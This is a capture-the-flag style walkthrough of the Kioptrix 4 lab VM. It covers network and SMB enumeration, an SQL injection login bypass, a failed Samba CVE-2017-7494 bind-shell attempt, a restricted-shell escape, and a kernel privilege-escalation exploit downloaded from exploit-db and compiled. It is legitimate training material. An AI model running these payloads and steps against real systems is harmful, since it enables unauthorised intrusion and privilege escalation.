Kioptrix 4 Walkthrough
Started off with some standard enumeration of IP and services, and of webpages.
root@kali:~# netdiscoverCurrently scanning: 192.168.68.0/16 | Screen View: Unique Hosts
5 Captured ARP Req/Rep packets, from 3 hosts. Total size: 300
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname red ARP Req/Rep packets, from ----- -----------------------------------------------------------------------------
192.168.50.91 00:0c:29:bf:e3:e7 1 60 VMware, Inc.root@kali:~# ip=192.168.50.91
root@kali:~# nmap -T4 -sS -A $ip
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-06 05:30 EDT
Nmap scan report for 192.168.50.91
Host is up (0.00053s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:BF:E3:E7 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: 10h00m01s, deviation: 2h49m42s, median: 8h00m01s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2019-05-06T13:30:59-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)TRACEROUTE
HOP RTT ADDRESS
1 0.53 ms 192.168.50.91OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.57 seconds
root@kali:~# dirb http://$ip-----------------
DIRB v2.22
By The Dark Raver
-----------------START_TIME: Mon May 6 05:31:28 2019
URL_BASE: http://192.168.50.91/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612---- Scanning URL: http://192.168.50.91/ ----
+ http://192.168.50.91/cgi-bin/ (CODE:403|SIZE:328)
==> DIRECTORY: http://192.168.50.91/images/
+ http://192.168.50.91/index (CODE:200|SIZE:1255)
+ http://192.168.50.91/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.50.91/john/
+ http://192.168.50.91/logout (CODE:302|SIZE:0)
+ http://192.168.50.91/member (CODE:302|SIZE:220)
+ http://192.168.50.91/server-status (CODE:403|SIZE:333)
---- Entering directory: http://192.168.50.91/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.50.91/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Mon May 6 05:31:32 2019
DOWNLOADED: 4612 - FOUND: 6
Navigating to /john, I am presented with a listable directory where I guessed that john was probably one of the usernames:
Heading back to main page, I took a stab at the login with SQLI:
Surprisingly, that worked:
So that’s the password for web application, but it doesn’t hurt to try the same password on the server itself; after all people do reuse passwords:
Tried out some commands and received an error message:
Since we haven’t explored the SMB ports discovered earlier on, I hopped on to that track and did further enumeration:
root@kali:~# nmap -script smb-enum-users.nse -script-args=unsafe=1 -p445,139 $ip
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-06 07:56 EDT
Nmap scan report for 192.168.50.91
Host is up (0.00058s latency).PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
MAC Address: 00:0C:29:BF:E3:E7 (VMware)Host script results:
| smb-enum-users:
| KIOPTRIX4\john (RID: 3002)
| Full name: ,,,
| Flags: Normal user account
| KIOPTRIX4\loneferret (RID: 3000)
| Full name: loneferret,,,
| Flags: Normal user account
| KIOPTRIX4\nobody (RID: 501)
| Full name: nobody
| Flags: Normal user account
| KIOPTRIX4\robert (RID: 3004)
| Full name: ,,,
| Flags: Normal user account
| KIOPTRIX4\root (RID: 1000)
| Full name: root
|_ Flags: Normal user accountNmap done: 1 IP address (1 host up) scanned in 0.43 seconds
So apart from john, we now have loneferret, nobody, robert, and root.
Using the same method of SQLI ’ or ‘1’=’1, this is what I got:
Just want to make sure there wasn’t any hidden text behind that padded password:
root@kali:~# echo ADGAdsafdfwt4gadfga== | base64 -d
1�vƟu�-��~base64: invalid inputUsing the password above, I’m in:
My attempt to find smb vulnerabilities wasn’t very fruitful:
root@kali:~# nmap -script smb-vuln-* -script-args=unsafe=1 -p445,139 $iproot@kali:~# nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=john,smbpass=MyNameIsJohn -p445 $ip
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-06 08:23 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:23
Completed NSE at 08:23, 0.00s elapsed
Initiating ARP Ping Scan at 08:23
Scanning 192.168.50.91 [1 port]
Completed ARP Ping Scan at 08:23, 0.14s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:23
Completed Parallel DNS resolution of 1 host. at 08:23, 0.01s elapsed
Initiating SYN Stealth Scan at 08:23
Scanning 192.168.50.91 [1 port]
Discovered open port 445/tcp on 192.168.50.91
Completed SYN Stealth Scan at 08:23, 0.07s elapsed (1 total ports)
NSE: Script scanning 192.168.50.91.
Initiating NSE at 08:23
Completed NSE at 08:23, 0.82s elapsed
Nmap scan report for 192.168.50.91
Host is up (0.00066s latency).PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 00:0C:29:BF:E3:E7 (VMware)Host script results:
| smb-enum-shares:
| account_used: john
| \\192.168.50.91\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (Kioptrix4 server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\192.168.50.91\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: READ
Let’s take a stab at the SMB path
root@kali:~# smbclient -L //192.168.50.91/IPC$
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password:
Anonymous login successfulSharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successfulServer Comment
--------- -------Workgroup Master
--------- -------
WORKGROUP KIOPTRIX4
I tried an RCE exploit from https://www.exploit-db.com/exploits/42060 but it didn’t work.
root@kali:~# sudo apt-get install python3-smbroot@kali:~# wget https://github.com/opsxcq/exploit-CVE-2017-7494/blob/master/libbindshell-samba.so
root@kali:~# python3 rce.py /root/libbindshell-samba.so 192.168.50.91 -p 445 -u guest
Traceback (most recent call last):
File "rce1.py", line 468, in <module>
main()
File "rce1.py", line 463, in main
fullpath = drop_payload(user, password, args.server, port, args.payload)
File "rce1.py", line 399, in drop_payload
shares = get_share_info(conn)
File "rce1.py", line 352, in get_share_info
return conn.listShares()
File "/usr/lib/python3/dist-packages/smb/SMBConnection.py", line 149, in listShares
self._pollForNetBIOSPacket(timeout)
File "/usr/lib/python3/dist-packages/smb/SMBConnection.py", line 545, in _pollForNetBIOSPacket
raise NotConnectedError
smb.base.NotConnectedErrorI went back to the target server on the limited shell to review again:
echo seems like the most probable command to escape the limited shell, so I tried some options but didn’t work:
With some googling, I found a post of “breaking out of jail shell”: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ with echo os.system(‘/bin/bash’)
Navigating to loneferret's directory, we see that while robert and john do not have sudo rights, loneferret seem to have:
Scouting around, I landed on crontab:
I decided to let scripts do the work:
robert@Kioptrix4:~$ wget https://www.securitysift.com/download/linuxprivchecker.py --no-check-certificate
robert@Kioptrix4:~$ python linuxprivchecker.py
(Concurrently, I took a long shot at brute-forcing via hydra, the root ssh password — which didn’t work out.)
I tried almost all the exploits from the above. As there wasn’t gcc compiler on the target server, I tried the bash exploit first — didn’t work out. I also avoided dirty cow because I’ve read that dirty cow wouldn’t work on OSCP exams, and thus wanted to find another way.
I then tried compiling on my Kali then hosting on my web server and downloading from target server, but the download couldn’t work for some reasons. I tried compiling online and wget-ing the compiled file directly:
But again, the target server couldn’t download from the above link. With that, I was left with ftp or scp, and being lazy, I chose the more insecure scp method of file transfer, and went through the exploits above one by one; lo and behold:
root@kali:~# wget https://www.exploit-db.com/download/9545 -O 9545.c
--2019-05-08 11:45:01-- https://www.exploit-db.com/download/9545
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [application/txt]
Saving to: ‘9545.c’9545.c [ <=> ] 9.55K --.-KB/s in 0s2019-05-08 11:45:02 (67.7 MB/s) - ‘9545.c’ saved [9783]root@kali:~# gcc -o 9545 9545.c
I was stuck at the limited shell, and privilege escalation for some time, and I was pretty sure that in the end, I took a different route from other players.
